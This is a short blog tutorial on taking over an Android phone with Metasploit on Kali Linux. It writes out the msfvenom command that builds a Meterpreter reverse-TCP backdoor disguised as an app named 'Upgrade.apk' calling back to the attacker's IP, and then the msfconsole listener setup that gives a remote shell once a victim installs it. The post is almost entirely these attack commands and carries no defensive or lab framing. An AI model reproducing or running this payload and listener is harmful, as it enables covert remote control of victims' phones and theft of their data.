Android Hacking By using Metasploit in Kali 2

1.)    Open a terminal and look for IP address using ifconfig command in my case it's>> 192.168.1.102

2.)    Now create a miscellaneous apk file by typing
msfvenom –p  android/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 R > ~/Desktop/Upgrade.apk

3.)    Now type msfconsole in the terminal.

4.)    Now we have to establish a listener now type >> use exploits/multi/handler.

5.)    Now set we have to set payload for the hack.
Set payload android/meterpreter/reverse_tcp

6.)    Now here we have to set the attacker’s IP address.
Set lhost 192.168.1.102

7.)    Now we have to set a listing port.
Set lport 4444

8.)    Now you are ready to hack the android phone.
Exploit


Post Credit:- rax4hax
Share on Google Plus

About Mr. Vishal Kalra

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment